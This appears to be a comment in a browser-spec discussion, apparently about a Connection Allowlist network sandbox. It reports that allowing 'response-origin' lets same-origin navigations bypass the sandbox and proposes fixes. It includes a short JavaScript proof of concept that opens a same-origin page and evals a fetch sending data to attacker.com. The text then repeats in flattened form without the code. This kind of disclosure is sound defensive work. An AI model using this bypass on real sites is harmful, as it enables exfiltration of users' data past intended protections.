As I currently see the specification, allowing the response-origin looks benign and doesn't seem to pose security implications at first sight. This is far from truth though as response-origin enables trivial exfiltration vectors from same-origin navigations to a non-sandboxed endpoint.
To demonstrate the issue:
// Similar can be done with iframes
var win = open('/unprotected-404-error-page-this-would-probably-point-to');
setTimeout(()=>{
win.eval("fetch('//attacker.com?exfil=123')");
}, 1000)
One solution could be to propagate the network sandbox on same-origin requests, but then a similar issue could be stemming if CSP was needed in addition to the Connection Allowlist to create an effective sandbox.
Another solution would be to limit the default list of URLs to be strictly an allowlist of non-navigational requests, and to allow a navigation it needs to be enabled separately through the already proposed allow-navigation=, while clearly noting that same-origin navigations could lead to a complete connection sandbox bypass.
As I currently see the specification, allowing the
response-originlooks benign and doesn't seem to pose security implications at first sight. This is far from truth though asresponse-originenables trivial exfiltration vectors from same-origin navigations to a non-sandboxed endpoint.To demonstrate the issue:
One solution could be to propagate the network sandbox on same-origin requests, but then a similar issue could be stemming if CSP was needed in addition to the Connection Allowlist to create an effective sandbox.
Another solution would be to limit the default list of URLs to be strictly an allowlist of non-navigational requests, and to allow a navigation it needs to be enabled separately through the already proposed
allow-navigation=, while clearly noting thatsame-originnavigations could lead to a complete connection sandbox bypass.